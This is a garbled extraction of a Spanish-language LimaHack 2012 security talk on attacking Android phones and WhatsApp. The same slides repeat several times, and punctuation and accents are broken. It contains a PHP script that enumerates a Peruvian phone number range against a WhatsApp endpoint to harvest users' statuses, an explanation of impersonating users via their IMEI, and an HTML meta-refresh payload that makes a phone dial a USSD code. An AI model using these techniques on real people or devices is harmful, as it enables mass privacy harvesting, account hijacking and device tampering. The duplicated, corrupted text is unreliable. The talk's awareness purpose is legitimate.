content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
